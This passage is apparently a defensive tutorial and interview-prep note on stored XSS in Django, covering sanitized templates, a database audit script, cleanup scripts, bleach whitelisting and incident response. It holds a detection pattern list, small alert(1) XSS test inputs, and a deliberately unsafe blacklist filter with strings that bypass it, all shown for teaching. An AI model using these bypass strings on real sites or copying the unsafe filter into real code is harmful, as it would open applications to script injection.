    <!-- ✅ title is sanitized and contains plain text only -->
    <h1>{{ post.title }}</h1>

    <div class="meta">
        Author: {{ post.author.username }}
    </div>

    <!-- ✅ clean_content is sanitized and contains only whitelisted HTML -->
    <div class="content">
        {{ post.clean_content|safe }}
    </div>
</article>

6️⃣ Detection and auditing

Manual detection

# security_audit.py
"""
Scan the database for potential XSS payloads.

Django must already be configured when this runs, for example:
    python manage.py shell
    >>> from security_audit import run_audit; run_audit()
"""
import re

from myapp.models import Comment, Post, UserProfile

# Dangerous patterns
DANGEROUS_PATTERNS = [
    r'<script',
    r'javascript:',
    r'onerror\s*=',
    r'onload\s*=',
    r'onclick\s*=',
    r'<iframe',
    r'<embed',
    r'<object',
]

def audit_model(model, field_name):
    """Audit one field of one model."""
    print(f"\nAuditing {model.__name__}.{field_name}...")

    suspicious_objects = []

    # iterator() avoids loading the whole table into memory at once
    for obj in model.objects.all().iterator():
        content = getattr(obj, field_name, '')

        if not content:
            continue

        # Check the content against each dangerous pattern
        for pattern in DANGEROUS_PATTERNS:
            if re.search(pattern, content, re.IGNORECASE):
                suspicious_objects.append({
                    'id': obj.id,
                    'content': content[:100],  # Show only the first 100 characters
                    'pattern': pattern
                })
                break

    if suspicious_objects:
        print(f"  ⚠️  Found {len(suspicious_objects)} suspicious objects:")
        for obj in suspicious_objects:
            print(f"    ID: {obj['id']}")
            print(f"    Content: {obj['content']}...")
            print(f"    Matched pattern: {obj['pattern']}\n")
    else:
        print("  ✅ No suspicious content found")

    return suspicious_objects

def run_audit():
    # Audit comments
    audit_model(Comment, 'content')

    # Audit posts (use 'html_content' for the Markdown-based Post model)
    audit_model(Post, 'content')

    # Audit user profiles
    audit_model(UserProfile, 'bio')
    audit_model(UserProfile, 'signature')

if __name__ == '__main__':
    run_audit()
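
The pattern list in the audit script names three event handlers, yet the payloads in section 4 use others such as onfocus and onmouseover. One possible refinement, sketched here without Django so that it can be tried in isolation, is to match any `on...=` attribute generically. The `SUSPICIOUS` regex, the `scan` function, and the sample rows are illustrative assumptions.

```python
import re

SUSPICIOUS = re.compile(
    r"<\s*(script|iframe|embed|object)\b"   # active-content elements
    r"|\bon[a-z]+\s*="                      # any inline event handler
    r"|javascript\s*:",                     # javascript: URLs
    re.IGNORECASE,
)

def scan(rows):
    """rows: iterable of (row_id, text). Yields (row_id, matched_text)."""
    for row_id, text in rows:
        match = SUSPICIOUS.search(text or "")
        if match:
            yield row_id, match.group(0)

rows = [
    (1, "Nice article, thanks!"),
    (2, "<img src=x onmouseover=alert(1)>"),
    (3, '<a href="JavaScript:alert(1)">click</a>'),
    (4, None),
]

print(list(scan(rows)))
```

A generic handler pattern will also flag innocent text such as "online=1", so its hits are leads for manual review rather than proof of an attack.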

Automated cleanup

# clean_database.py
"""
Clean XSS payloads out of the database.

Back up the database first, and run this where Django is already
configured (for example from `python manage.py shell`).
"""
import logging

from django.db import transaction
from myapp.models import Comment, Post
from utils.sanitizer import sanitize_html

logger = logging.getLogger(__name__)

@transaction.atomic
def clean_comments():
    """Sanitize every comment."""
    comments = Comment.objects.all()
    cleaned_count = 0

    for comment in comments:
        original_content = comment.content
        comment.content = sanitize_html(original_content)

        if comment.content != original_content:
            comment.save()
            cleaned_count += 1
            logger.warning(f"Sanitized comment ID={comment.id}")

    print(f"Sanitized {cleaned_count} comments")
    return cleaned_count

@transaction.atomic
def clean_posts():
    """Sanitize every post."""
    posts = Post.objects.all()
    cleaned_count = 0

    for post in posts:
        original_content = post.content
        post.content = sanitize_html(original_content)

        if post.content != original_content:
            post.save()
            cleaned_count += 1
            logger.warning(f"Sanitized post ID={post.id}")

    print(f"Sanitized {cleaned_count} posts")
    return cleaned_count

if __name__ == '__main__':
    print("Starting database cleanup...")
    clean_comments()
    clean_posts()
    print("Cleanup finished!")

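7️⃣ Common interview questions

Q1: Why is Stored XSS more dangerous than Reflected XSS?

Sample answer:

1. Wider impact:

Reflected XSS: affects only users who click the malicious link
Stored XSS: affects every user who visits the page

2. Longer duration:

Reflected XSS: a one-off attack
Stored XSS: the malicious script stays in place until it is found and removed

3. Stealthier:

Reflected XSS: the malicious code may be visible in the URL
Stored XSS: the malicious code sits in the database, where it is hard to spot

4. Can become a worm:

As the MySpace Samy worm showed, Stored XSS can replicate itself and spread exponentially

5. Harder to clean up:

Reflected XSS: nothing to clean up
Stored XSS: every malicious record in the database has to be cleaned

Real-world example: the MySpace Samy worm infected about 1 million users within roughly 20 hours. Spread at that speed depends on a payload that is stored and served to every visitor.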

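Q2: In Django, how can users be allowed to submit rich-text content safely?

Sample answer:

Recommended option 1: Use Markdown (best practice)

# 1. The user writes Markdown
# 2. Convert it to HTML
# 3. Sanitize with bleach
# 4. Store in the database

from django.db import models
import markdown
import bleach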

class Post(models.Model):
    markdown_content = models.TextField()
    html_content = models.TextField()

    def save(self, *args, **kwargs):
        # Step 1: Markdown -> HTML
        html = markdown.markdown(self.markdown_content)

        # Step 2: Sanitize the HTML
        self.html_content = bleach.clean(
            html,
            tags=['p', 'strong', 'em', 'a', 'code', 'pre'],
            attributes={'a': ['href']},
            strip=True
        )

        super().save(*args, **kwargs)

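Advantages:

✅ Markdown gives users far less markup to work with than raw HTML (raw HTML in the input is still passed through, which is why step 2 matters)
✅ The generated HTML is predictable
✅ Covers common formatting needs
✅ High level of safety

Recommended option 2: Filter HTML with a Bleach whitelist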

import bleach

def save_content(user_html):
    # Allow only safe tags
    clean_html = bleach.clean(
        user_html,
        tags=['p', 'br', 'strong', 'em', 'u', 'a'],
        attributes={'a': ['href', 'title']},
        strip=True
    )

    # Convert bare URLs into links (linkify adds rel="nofollow" by default)
    clean_html = bleach.linkify(clean_html)

    return clean_html

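Advantages:

✅ Uses a whitelist, so only explicitly safe tags are allowed
✅ Some formatting can still be permitted
✅ bleach is a library designed specifically for this job

❌ Not recommended: blacklist filtering

# ❌ Unsafe!
def unsafe_clean(html):
    # Try to remove dangerous tags
    html = html.replace('<script>', '')
    html = html.replace('onerror=', '')
    # ...more replacements
    return html

Problems:

Mixed case bypasses it: <ScRiPt>
Encoding bypasses it, for example entity-encoded input such as &lt;script&gt; that a later step decodes back into a tag
No blacklist can ever enumerate every dangerous pattern

Key principle: whitelist > blacklist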
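
The weaknesses listed above are easy to reproduce. The snippet below repeats the `unsafe_clean` function from the listing (parameter renamed to `markup`) and feeds it three inputs chosen for illustration. Each one defeats the filter in a different way.

```python
def unsafe_clean(markup):
    """The blacklist filter from above, reproduced for testing."""
    markup = markup.replace("<script>", "")
    markup = markup.replace("onerror=", "")
    return markup

# 1. Mixed case: str.replace is case-sensitive, so nothing is removed.
print(unsafe_clean("<ScRiPt>alert(1)</ScRiPt>"))

# 2. Nesting: removing the inner "<script>" glues the outer pieces into a new tag.
print(unsafe_clean("<scr<script>ipt>alert(1)</script>"))

# 3. Whitespace: browsers accept "onerror =", the filter only knows "onerror=".
print(unsafe_clean("<img src=x onerror =alert(1)>"))
```

The second case is the most instructive: the filter's own removal step is what assembles the dangerous tag. That is a structural weakness of pattern removal, and no amount of extra patterns fixes it.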

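Q3: What should you do if you discover XSS payloads already sitting in the production database?

Sample answer:

Emergency response procedure:

Step 1: Limit the damage immediately

# 1. Temporarily disable the affected feature or page
# 2. Remove every |safe from the templates
# 3. Deploy the fix

Step 2: Identify the affected data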

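# security_audit.py
from myapp.models import Comment

def find_xss_payloads():
    suspicious = []

    # Quick first pass: this only catches <script>; use the full pattern
    # list from the audit script for a real investigation
    for comment in Comment.objects.all():
        if '<script' in comment.content.lower():
            suspicious.append(comment)

    return suspicious

affected_comments = find_xss_payloads()
print(f"Found {len(affected_comments)} suspicious comments")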

Step 3: Clean the data

import logging

from django.db import transaction
from myapp.models import Comment
from utils.sanitizer import sanitize_html

logger = logging.getLogger(__name__)

@transaction.atomic
def clean_database():
    # Back up the database before running this (important!)
    # pg_dump mydb > backup.sql

    # Sanitize every affected record
    for comment in Comment.objects.all():
        original = comment.content
        comment.content = sanitize_html(original)

        if comment.content != original:
            comment.save()
            logger.warning(f"Sanitized Comment ID={comment.id}")

clean_database()

Step 4: Audit and record

# Keep a record of everything that was sanitized
class SecurityAuditLog(models.Model):
    model_name = models.CharField(max_length=100)
    object_id = models.IntegerField()
    original_content = models.TextField()
    cleaned_content = models.TextField()
    cleaned_at = models.DateTimeField(auto_now_add=True)

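Step 5: Prevent future attacks

# 1. Implement content sanitization
# 2. Enable CSP
# 3. Set HttpOnly cookies
# 4. Add input validation
# 5. Run regular security scans

Step 6: Notify users (if necessary)

# If sensitive information leaked (for example, cookies were stolen),
# you need to:
# 1. Force every user to log in again
# 2. Send a security notification email
# 3. Advise users to change their passwords

Preventive measures:

✅ Implement layered defenses
✅ Audit security regularly
✅ Automate security scanning
✅ Log all user submissions
✅ Set up anomaly detection and alerting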

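8️⃣ Key takeaways

Core concepts

Characteristics of Stored XSS:
- Persistence: the malicious script is stored on the server
- Automatic propagation: visiting the page triggers it
- Wide impact: every user is exposed
- Worm potential: it can replicate and spread by itself

Most dangerous scenarios:
- Guestbooks / comment systems
- User profiles (bio, signature)
- Forums / social media
- Anywhere users can submit content that is stored permanently

Golden rules of defense:
- Never trust user input
- Whitelist > blacklist
- Layered defense (Defense in Depth)

Django best practices:
- ✅ Use Markdown instead of HTML
- ✅ Filter with a Bleach whitelist
- ✅ Rely on Django template auto-escaping
- ✅ Avoid |safe and mark_safe
- ✅ Deploy CSP
- ✅ Use HttpOnly cookies
- ✅ Audit security regularly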

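Defense checklist

Input stage:

Validate with Django Forms
Limit length and format
Sanitize HTML with bleach

Storage stage:

Sanitize content in the save() method
Store both the original and the sanitized content (Markdown + HTML)
Write audit logs

Output stage:

Use Django template auto-escaping
Avoid |safe (unless the content has been sanitized)
Deploy CSP

Cookie security:

SESSION_COOKIE_HTTPONLY = True
CSRF_COOKIE_HTTPONLY = True
SESSION_COOKIE_SECURE = True
SESSION_COOKIE_SAMESITE = 'Strict'

Monitoring:

Scan the database regularly (security_audit.py)
Log all user submissions
Detect anomalies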


📝 Completed: 2025-01-15 🔖 Tags: #WebSecurity #XSS #StoredXSS #Django #Python #InterviewPrep